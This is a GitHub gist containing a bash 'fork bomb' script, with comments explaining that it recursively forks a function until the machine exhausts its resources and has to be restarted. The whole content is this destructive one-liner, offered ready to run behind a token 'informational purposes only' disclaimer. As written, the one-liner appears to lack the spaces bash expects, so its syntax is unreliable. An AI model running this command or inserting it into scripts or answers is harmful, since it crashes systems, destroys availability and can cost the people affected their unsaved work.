Skip to content

Instantly share code, notes, and snippets.

@Thomashighbaugh
Created September 25, 2022 19:36
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Thomashighbaugh/75561e02f6c6d710c9b1e04b2aaff1b7 to your computer and use it in GitHub Desktop.
Save Thomashighbaugh/75561e02f6c6d710c9b1e04b2aaff1b7 to your computer and use it in GitHub Desktop.
#! /bin/bash
#################################################################################################################################
# DESCRIPTION: causes the system it is run on to consume 100% of its system resources through the recusive forking of a function
# that does nothing but will continue to fork itself in the background by calling itself.
##################################################################################################################################
# USE: crash the system it is executed on, forces the system to be restarted to resume use thereof
##################################################################################################################################
# WARNING: this is for informational purposes only, don't do stupid or illegal things with it unless willing to pay the karmic toll
# of using it.
##################################################################################################################################
:(){:|:&};:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment